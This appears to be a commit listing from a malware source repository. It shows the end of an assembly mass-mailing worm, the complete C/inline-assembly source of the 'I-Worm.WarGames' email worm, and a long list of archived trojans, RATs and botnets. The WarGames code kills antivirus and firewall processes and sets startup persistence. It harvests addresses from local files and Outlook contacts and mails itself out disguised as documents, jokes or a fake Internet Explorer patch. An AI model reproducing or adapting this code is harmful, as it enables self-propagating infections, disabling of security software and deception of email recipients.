|
push offset pathname
|
||||||
|
api GetWindowsDirectoryA
|
||||||
|
@pushsz "\NetInfo.doc"
|
||||||
|
push offset pathname
|
||||||
|
api lstrcat
|
||||||
|
|
||||||
|
verif_inet:
|
||||||
|
push 0
|
||||||
|
push offset inet
|
||||||
|
api InternetGetConnectedState
|
||||||
|
dec eax
|
||||||
|
jnz verif_inet
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push 0
|
||||||
|
push 3
|
||||||
|
push 0
|
||||||
|
push 1
|
||||||
|
push 80000000h
|
||||||
|
@pushsz "C:\backup.win"
|
||||||
|
api CreateFileA
|
||||||
|
inc eax
|
||||||
|
je end_worm
|
||||||
|
dec eax
|
||||||
|
xchg ebx,eax
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push 0
|
||||||
|
push 0
|
||||||
|
push 2
|
||||||
|
push 0
|
||||||
|
push ebx
|
||||||
|
api CreateFileMappingA
|
||||||
|
test eax,eax
|
||||||
|
je end_w1
|
||||||
|
xchg eax,ebp
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push 0
|
||||||
|
push 0
|
||||||
|
push 4
|
||||||
|
push ebp
|
||||||
|
api MapViewOfFile
|
||||||
|
test eax,eax
|
||||||
|
je end_w2
|
||||||
|
xchg eax,esi
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push ebx
|
||||||
|
api GetFileSize
|
||||||
|
cmp eax,3
|
||||||
|
jbe end_w3
|
||||||
|
|
||||||
|
scan_mail:
|
||||||
|
xor edx,edx
|
||||||
|
mov edi,offset mail_addr
|
||||||
|
push edi
|
||||||
|
p_c: lodsb
|
||||||
|
cmp al," "
|
||||||
|
je car_s
|
||||||
|
cmp al,0dh
|
||||||
|
je entr1
|
||||||
|
cmp al,0ah
|
||||||
|
je entr2
|
||||||
|
cmp al,"#"
|
||||||
|
je f_mail
|
||||||
|
cmp al,'@'
|
||||||
|
jne not_a
|
||||||
|
inc edx
|
||||||
|
not_a: stosb
|
||||||
|
jmp p_c
|
||||||
|
car_s: inc esi
|
||||||
|
jmp p_c
|
||||||
|
entr1: xor al,al
|
||||||
|
stosb
|
||||||
|
pop edi
|
||||||
|
test edx,edx
|
||||||
|
je scan_mail
|
||||||
|
call send_mail
|
||||||
|
jmp scan_mail
|
||||||
|
entr2: xor al,al
|
||||||
|
stosb
|
||||||
|
pop edi
|
||||||
|
jmp scan_mail
|
||||||
|
f_mail:
|
||||||
|
|
||||||
|
end_w3: push esi
|
||||||
|
api UnmapViewOfFile
|
||||||
|
end_w2: push ebp
|
||||||
|
api CloseHandle
|
||||||
|
end_w1: push ebx
|
||||||
|
api CloseHandle
|
||||||
|
|
||||||
|
|
||||||
|
end_worm:
|
||||||
|
push 0
|
||||||
|
api ExitProcess
|
||||||
|
|
||||||
|
send_mail:
|
||||||
|
xor eax,eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push offset Message
|
||||||
|
push eax
|
||||||
|
push [sess]
|
||||||
|
api MAPISendMail
|
||||||
|
ret
|
||||||
|
|
||||||
|
.data
|
||||||
|
orig_worm db 50 dup (0)
|
||||||
|
pathname db 50 dup (0)
|
||||||
|
mail_addr db 128 dup (?)
|
||||||
|
inet dd 0
|
||||||
|
sess dd 0
|
||||||
|
|
||||||
|
subject db "A comical story for you.",0
|
||||||
|
body db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
|
||||||
|
db 9,"Best Regards. You friend.",0
|
||||||
|
filename db "comical_story.doc",0
|
||||||
|
|
||||||
|
Message dd ?
|
||||||
|
dd offset subject
|
||||||
|
dd offset body
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd 2
|
||||||
|
dd offset MsgFrom
|
||||||
|
dd 1
|
||||||
|
dd offset MsgTo
|
||||||
|
dd 1
|
||||||
|
dd offset Attach
|
||||||
|
|
||||||
|
MsgFrom dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
MsgTo dd ?
|
||||||
|
dd 1
|
||||||
|
dd offset mail_addr
|
||||||
|
dd offset mail_addr
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
Attach dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd offset pathname
|
||||||
|
dd offset filename
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
|
||||||
|
end start
|
||||||
|
end
|
379
Win32/I-Worm.WarGames.c
Normal file
379
Win32/I-Worm.WarGames.c
Normal file
@ -0,0 +1,379 @@
|
|||||||
|
/*
|
||||||
|
Name : I-Worm.WarGames
|
||||||
|
Author : PetiK
|
||||||
|
Date : February 12th 2002 - February 22th 2002
|
||||||
|
Language : C++/Win32asm
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <windows.h>
|
||||||
|
#include <mapi.h>
|
||||||
|
#include <tlhelp32.h>
|
||||||
|
#pragma argused
|
||||||
|
#pragma inline
|
||||||
|
|
||||||
|
char filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
|
||||||
|
int num,counter=0;
|
||||||
|
char *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
|
||||||
|
"n","o","p","q","r","s","t","u","v","w","x","y","z"};
|
||||||
|
char dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
|
||||||
|
LPSTR SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
|
||||||
|
BYTE desktop[50],favoris[50],personal[50],cache[50],page[150];
|
||||||
|
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
|
||||||
|
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
|
||||||
|
DWORD type=REG_SZ;
|
||||||
|
FILE *vbsworm,*winstart;
|
||||||
|
HANDLE lSnapshot,myproc;
|
||||||
|
BOOL rProcessFound;
|
||||||
|
|
||||||
|
LHANDLE session;
|
||||||
|
MapiMessage mess;
|
||||||
|
MapiMessage *mes;
|
||||||
|
MapiRecipDesc from;
|
||||||
|
char messId[512],mname[50],maddr[30];
|
||||||
|
HINSTANCE hMAPI;
|
||||||
|
|
||||||
|
WIN32_FIND_DATA ffile;
|
||||||
|
PROCESSENTRY32 uProcess;
|
||||||
|
HKEY hReg;
|
||||||
|
SYSTEMTIME wartime;
|
||||||
|
|
||||||
|
void StopAV(char *);
|
||||||
|
void FindFile(char *,char *);
|
||||||
|
void GetMail(char *,char *);
|
||||||
|
void sendmail(char *);
|
||||||
|
|
||||||
|
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
|
||||||
|
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
|
||||||
|
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
|
||||||
|
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
|
||||||
|
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
|
||||||
|
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
|
||||||
|
|
||||||
|
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
|
||||||
|
{
|
||||||
|
// Kill Some AntiVirus
|
||||||
|
StopAV("AVP32.EXE"); // AVP
|
||||||
|
StopAV("AVPCC.EXE"); // AVP
|
||||||
|
StopAV("AVPM.EXE"); // AVP
|
||||||
|
StopAV("WFINDV32.EXE"); // Dr. Solomon
|
||||||
|
StopAV("F-AGNT95.EXE"); // F-Secure
|
||||||
|
StopAV("NAVAPW32.EXE"); // Norton Antivirus
|
||||||
|
StopAV("NAVW32.EXE"); // Norton Antivirus
|
||||||
|
StopAV("NMAIN.EXE"); // Norton Antivirus
|
||||||
|
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
|
||||||
|
StopAV("ZONEALARM.EXE"); // ZoneAlarm
|
||||||
|
|
||||||
|
// Kill Some Worm
|
||||||
|
StopAV("KERN32.EXE"); // I-Worm.Badtrans
|
||||||
|
StopAV("SETUP.EXE"); // I-Worm.Cholera
|
||||||
|
StopAV("RUNDLLW32.EXE"); // I-Worm.Gift
|
||||||
|
StopAV("GONER.SCR"); // I-Worm.Goner
|
||||||
|
StopAV("LOAD.EXE"); // I-Worm.Nimda
|
||||||
|
StopAV("INETD.EXE"); // I-Worm.Plage - BadTrans
|
||||||
|
StopAV("FILES32.VXD"); // I-Worm.PrettyPark
|
||||||
|
StopAV("SCAM32.EXE"); // I-Worm.Sircam
|
||||||
|
StopAV("GDI32.EXE"); // I-Worm.Sonic
|
||||||
|
StopAV("_SETUP.EXE"); // I-Worm.ZippedFiles
|
||||||
|
StopAV("EXPLORE.EXE"); // I-Worm.ZippedFiles
|
||||||
|
StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles
|
||||||
|
|
||||||
|
GetModuleFileName(hInst,filename,100);
|
||||||
|
GetSystemDirectory((char *)sysdir,100);
|
||||||
|
SetCurrentDirectory(sysdir);
|
||||||
|
CopyFile(filename,"article.doc.exe",TRUE);
|
||||||
|
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
|
||||||
|
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
|
||||||
|
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
|
||||||
|
RegCloseKey(hReg);
|
||||||
|
|
||||||
|
randomize();
|
||||||
|
num=rand() % 10;
|
||||||
|
randname:
|
||||||
|
strcat(copyr,alph[GetTickCount()%25]);
|
||||||
|
if(++counter==num) {
|
||||||
|
strcat(copyr,".exe");
|
||||||
|
MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
|
||||||
|
CopyFile(filename,copyr,FALSE);
|
||||||
|
WriteProfileString("WINDOWS","RUN",copyr);
|
||||||
|
WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
|
||||||
|
goto endrandname;
|
||||||
|
}
|
||||||
|
Sleep(GetTickCount()%100);
|
||||||
|
goto randname;
|
||||||
|
endrandname:
|
||||||
|
|
||||||
|
hMAPI=LoadLibrary("MAPI32.DLL");
|
||||||
|
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
|
||||||
|
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
|
||||||
|
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
|
||||||
|
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
|
||||||
|
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
|
||||||
|
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
|
||||||
|
RegCloseKey(hReg);
|
||||||
|
GetWindowsDirectory((char *)winhtm,100);
|
||||||
|
|
||||||
|
_asm
|
||||||
|
{
|
||||||
|
call @wininet
|
||||||
|
db "WININET.DLL",0
|
||||||
|
@wininet:
|
||||||
|
call LoadLibrary
|
||||||
|
test eax,eax
|
||||||
|
jz end_asm
|
||||||
|
mov ebp,eax
|
||||||
|
call @inetconnect
|
||||||
|
db "InternetGetConnectedState",0
|
||||||
|
@inetconnect:
|
||||||
|
push ebp
|
||||||
|
call GetProcAddress
|
||||||
|
test eax,eax
|
||||||
|
jz end_wininet
|
||||||
|
mov edi,eax
|
||||||
|
verf:
|
||||||
|
push 0
|
||||||
|
push Tmp
|
||||||
|
call edi
|
||||||
|
dec eax
|
||||||
|
jnz verf
|
||||||
|
|
||||||
|
end_wininet:
|
||||||
|
push ebp
|
||||||
|
call FreeLibrary
|
||||||
|
end_asm:
|
||||||
|
jmp end_all_asm
|
||||||
|
|
||||||
|
Tmp dd 0
|
||||||
|
|
||||||
|
end_all_asm:
|
||||||
|
}
|
||||||
|
|
||||||
|
FindFile(desktop,"*.htm");
|
||||||
|
FindFile(desktop,"*.doc");
|
||||||
|
FindFile(favoris,"*.ht*");
|
||||||
|
FindFile(personal,"*.ht*");
|
||||||
|
FindFile(personal,"*.doc");
|
||||||
|
FindFile(personal,"*.xls");
|
||||||
|
FindFile(personal,"*.asp");
|
||||||
|
FindFile(cache,".ht*");
|
||||||
|
FindFile(cache,".php");
|
||||||
|
FindFile(cache,".asp");
|
||||||
|
FindFile(winhtm,".ht*");
|
||||||
|
FindFile(winhtm,".doc");
|
||||||
|
|
||||||
|
|
||||||
|
vbsworm=fopen("wargames.vbs","w");
|
||||||
|
fprintf(vbsworm,"On Error Resume Next\n");
|
||||||
|
fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
|
||||||
|
fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
|
||||||
|
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
|
||||||
|
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
|
||||||
|
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
|
||||||
|
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
|
||||||
|
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
|
||||||
|
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
|
||||||
|
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
|
||||||
|
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
|
||||||
|
fprintf(vbsworm,"EM.To=AD.Address\n");
|
||||||
|
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
|
||||||
|
fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
|
||||||
|
fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
|
||||||
|
fprintf(vbsworm,"EM.Body=body\n");
|
||||||
|
fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
|
||||||
|
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
|
||||||
|
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
|
||||||
|
fprintf(vbsworm,"EM.Send\n");
|
||||||
|
fprintf(vbsworm,"End If\n");
|
||||||
|
fprintf(vbsworm,"Next\n");
|
||||||
|
fprintf(vbsworm,"End If\n");
|
||||||
|
fprintf(vbsworm,"Next\n");
|
||||||
|
fclose(vbsworm);
|
||||||
|
ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
|
||||||
|
Sleep(5000);
|
||||||
|
DeleteFile("wargames.vbs");
|
||||||
|
|
||||||
|
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
|
||||||
|
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
|
||||||
|
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
|
||||||
|
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
|
||||||
|
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
|
||||||
|
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
|
||||||
|
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
|
||||||
|
do {
|
||||||
|
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
|
||||||
|
strcpy(mname,mes->lpOriginator->lpszName);
|
||||||
|
strcpy(maddr,mes->lpOriginator->lpszAddress);
|
||||||
|
mes->ulReserved=0;
|
||||||
|
mes->lpszSubject="Re: Fw:";
|
||||||
|
mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
|
||||||
|
"I send you a nice program. Look at this.\n\n"
|
||||||
|
" See you soon.";
|
||||||
|
mes->lpszMessageType=NULL;
|
||||||
|
mes->lpszDateReceived=NULL;
|
||||||
|
mes->lpszConversationID=NULL;
|
||||||
|
mes->flFlags=MAPI_SENT;
|
||||||
|
mes->lpOriginator->ulReserved=0;
|
||||||
|
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
|
||||||
|
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
|
||||||
|
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
|
||||||
|
mes->nRecipCount=1;
|
||||||
|
mes->lpRecips->ulReserved=0;
|
||||||
|
mes->lpRecips->ulRecipClass=MAPI_TO;
|
||||||
|
mes->lpRecips->lpszName=mname;
|
||||||
|
mes->lpRecips->lpszAddress=maddr;
|
||||||
|
mes->nFileCount=1;
|
||||||
|
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
|
||||||
|
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
|
||||||
|
mes->lpFiles->ulReserved=0;
|
||||||
|
mes->lpFiles->flFlags=NULL;
|
||||||
|
mes->lpFiles->nPosition=-1;
|
||||||
|
mes->lpFiles->lpszPathName=filename;
|
||||||
|
mes->lpFiles->lpszFileName="funny.exe";
|
||||||
|
mes->lpFiles->lpFileType=NULL;
|
||||||
|
mSendMail(session, NULL, mes, NULL, NULL);
|
||||||
|
}
|
||||||
|
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
|
||||||
|
free(mes->lpFiles);
|
||||||
|
mFreeBuffer(mes);
|
||||||
|
mLogoff(session,0,0,0);
|
||||||
|
FreeLibrary(hMAPI);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
void FindFile(char *folder, char *ext)
|
||||||
|
{
|
||||||
|
register bool abc=TRUE;
|
||||||
|
register HANDLE hFile;
|
||||||
|
char mail[128];
|
||||||
|
SetCurrentDirectory(folder);
|
||||||
|
hFile=FindFirstFile(ext,&ffile);
|
||||||
|
if(hFile!=INVALID_HANDLE_VALUE) {
|
||||||
|
while(abc) {
|
||||||
|
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
|
||||||
|
GetMail(ffile.cFileName,mail);
|
||||||
|
if(strlen(mail)>0) {
|
||||||
|
sendmail(mail);
|
||||||
|
}
|
||||||
|
abc=FindNextFile(hFile,&ffile);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
void GetMail(char *namefile, char *mail)
|
||||||
|
{
|
||||||
|
HANDLE hf,hf2;
|
||||||
|
char *mapped;
|
||||||
|
DWORD size,i,k;
|
||||||
|
BOOL test=FALSE,valid=FALSE;
|
||||||
|
mail[0]=0;
|
||||||
|
|
||||||
|
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
|
||||||
|
if(hf==INVALID_HANDLE_VALUE)
|
||||||
|
return;
|
||||||
|
size=GetFileSize(hf,NULL);
|
||||||
|
if(!size)
|
||||||
|
return;
|
||||||
|
if(size<8)
|
||||||
|
return;
|
||||||
|
size-=100;
|
||||||
|
|
||||||
|
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
|
||||||
|
if(!hf2) {
|
||||||
|
CloseHandle(hf);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
|
||||||
|
if(!mapped) {
|
||||||
|
CloseHandle(hf2);
|
||||||
|
CloseHandle(hf);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
i=0;
|
||||||
|
while(i<size && !test) {
|
||||||
|
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
|
||||||
|
test=TRUE;
|
||||||
|
i+=strlen("mailto:");
|
||||||
|
k=0;
|
||||||
|
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
|
||||||
|
if(mapped[i]!=' ') {
|
||||||
|
mail[k]=mapped[i];
|
||||||
|
k++;
|
||||||
|
if(mapped[i]=='@')
|
||||||
|
valid=TRUE;
|
||||||
|
}
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
mail[k]=0;
|
||||||
|
} else
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(!valid)
|
||||||
|
mail[0]=0;
|
||||||
|
UnmapViewOfFile(mapped);
|
||||||
|
CloseHandle(hf2);
|
||||||
|
CloseHandle(hf);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
void sendmail(char *tos)
|
||||||
|
{
|
||||||
|
memset(&mess,0,sizeof(MapiMessage));
|
||||||
|
memset(&from,0,sizeof(MapiRecipDesc));
|
||||||
|
wsprintf(subj,"Mail to %s.",tos);
|
||||||
|
|
||||||
|
from.lpszName=NULL;
|
||||||
|
from.ulRecipClass=MAPI_ORIG;
|
||||||
|
mess.lpszSubject=subj;
|
||||||
|
mess.lpszNoteText="I send you this patch.\n"
|
||||||
|
"It corrects a bug into Internet Explorer and Outlook.\n\n"
|
||||||
|
" Have a nice day. Best Regards.";
|
||||||
|
|
||||||
|
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
|
||||||
|
if(!mess.lpRecips)
|
||||||
|
return;
|
||||||
|
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
|
||||||
|
mess.lpRecips->lpszName=tos;
|
||||||
|
mess.lpRecips->lpszAddress=tos;
|
||||||
|
mess.lpRecips->ulRecipClass=MAPI_TO;
|
||||||
|
mess.nRecipCount=1;
|
||||||
|
|
||||||
|
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
|
||||||
|
if(!mess.lpFiles)
|
||||||
|
return;
|
||||||
|
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
|
||||||
|
mess.lpFiles->lpszPathName=filename;
|
||||||
|
mess.lpFiles->lpszFileName="patch.exe";
|
||||||
|
mess.nFileCount=1;
|
||||||
|
|
||||||
|
mess.lpOriginator=&from;
|
||||||
|
|
||||||
|
mSendMail(0,0,&mess,0,0);
|
||||||
|
|
||||||
|
free(mess.lpRecips);
|
||||||
|
free(mess.lpFiles);
|
||||||
|
}
|
||||||
|
|
||||||
|
void StopAV(char *antivirus)
|
||||||
|
{
|
||||||
|
register BOOL term;
|
||||||
|
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
|
||||||
|
uProcess.dwSize=sizeof(uProcess);
|
||||||
|
rProcessFound=Process32First(lSnapshot,&uProcess);
|
||||||
|
while(rProcessFound) {
|
||||||
|
if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
|
||||||
|
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
|
||||||
|
if(myproc!=NULL) {
|
||||||
|
term=TerminateProcess(myproc,0);
|
||||||
|
}
|
||||||
|
CloseHandle(myproc);
|
||||||
|
}
|
||||||
|
rProcessFound=Process32Next(lSnapshot,&uProcess);
|
||||||
|
}
|
||||||
|
CloseHandle(lSnapshot);
|
||||||
|
}
|
15931
Win32/I-Worm.Win9x.Troodon.asm
Normal file
15931
Win32/I-Worm.Win9x.Troodon.asm
Normal file
File diff suppressed because it is too large
Load Diff
2461
Win32/I-Worm.XTC.asm
Normal file
2461
Win32/I-Worm.XTC.asm
Normal file
File diff suppressed because it is too large
Load Diff
BIN
Win32/MonsterWorm.7z
Normal file
BIN
Win32/MonsterWorm.7z
Normal file
Binary file not shown.
BIN
Win32/NytrojanByNytro.7z
Normal file
BIN
Win32/NytrojanByNytro.7z
Normal file
Binary file not shown.
BIN
Win32/OminousRAT.7z
Normal file
BIN
Win32/OminousRAT.7z
Normal file
Binary file not shown.
BIN
Win32/PlutoniumByMr3amo.7z
Normal file
BIN
Win32/PlutoniumByMr3amo.7z
Normal file
Binary file not shown.
BIN
Win32/RST.Trojan.7z
Normal file
BIN
Win32/RST.Trojan.7z
Normal file
Binary file not shown.
BIN
Win32/VbsCrypterByTrojanHorce.7z
Normal file
BIN
Win32/VbsCrypterByTrojanHorce.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.4HorseMan.a.7z
Normal file
BIN
Win32/Win32.4HorseMan.a.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.4HorseMan.b.7z
Normal file
BIN
Win32/Win32.4HorseMan.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.A59.7z
Normal file
BIN
Win32/Win32.A59.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Acid.b.7z
Normal file
BIN
Win32/Win32.Acid.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Ago.c.7z
Normal file
BIN
Win32/Win32.Ago.c.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Ak.7z
Normal file
BIN
Win32/Win32.Ak.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Beta.7z
Normal file
BIN
Win32/Win32.Beta.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.BlackDream.7z
Normal file
BIN
Win32/Win32.BlackDream.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Carberp.7z
Normal file
BIN
Win32/Win32.Carberp.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Cyber.b.7z
Normal file
BIN
Win32/Win32.Cyber.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.D.a.7z
Normal file
BIN
Win32/Win32.D.a.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.D.b.7z
Normal file
BIN
Win32/Win32.D.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.DarkAnal.7z
Normal file
BIN
Win32/Win32.DarkAnal.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Darkness.a.7z
Normal file
BIN
Win32/Win32.Darkness.a.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Darkness.b.7z
Normal file
BIN
Win32/Win32.Darkness.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.EnglishRat.7z
Normal file
BIN
Win32/Win32.EnglishRat.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.ForBot.7z
Normal file
BIN
Win32/Win32.ForBot.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.FukJ.7z
Normal file
BIN
Win32/Win32.FukJ.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Fungus.7z
Normal file
BIN
Win32/Win32.Fungus.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Ganja.c.7z
Normal file
BIN
Win32/Win32.Ganja.c.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Grum.7z
Normal file
BIN
Win32/Win32.Grum.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.H.7z
Normal file
BIN
Win32/Win32.H.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Hell.7z
Normal file
BIN
Win32/Win32.Hell.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Hellbot.c.7z
Normal file
BIN
Win32/Win32.Hellbot.c.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Hidden.7z
Normal file
BIN
Win32/Win32.Hidden.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Hydra.7z
Normal file
BIN
Win32/Win32.Hydra.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.IMBot.7z
Normal file
BIN
Win32/Win32.IMBot.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Liquid.7z
Normal file
BIN
Win32/Win32.Liquid.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Litmus.7z
Normal file
BIN
Win32/Win32.Litmus.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Lolworm.7z
Normal file
BIN
Win32/Win32.Lolworm.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Nes.e.7z
Normal file
BIN
Win32/Win32.Nes.e.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Null.7z
Normal file
BIN
Win32/Win32.Null.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Nzm.7z
Normal file
BIN
Win32/Win32.Nzm.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Poshspy.7z
Normal file
BIN
Win32/Win32.Poshspy.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Pwnbot.7z
Normal file
BIN
Win32/Win32.Pwnbot.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.RBot.7z
Normal file
BIN
Win32/Win32.RBot.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Rage.7z
Normal file
BIN
Win32/Win32.Rage.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Reptile.7z
Normal file
BIN
Win32/Win32.Reptile.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Riot.7z
Normal file
BIN
Win32/Win32.Riot.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Rose.c.7z
Normal file
BIN
Win32/Win32.Rose.c.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Rubilyn.7z
Normal file
BIN
Win32/Win32.Rubilyn.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Ruff.7z
Normal file
BIN
Win32/Win32.Ruff.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Rx.7z
Normal file
BIN
Win32/Win32.Rx.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.S5.7z
Normal file
BIN
Win32/Win32.S5.7z
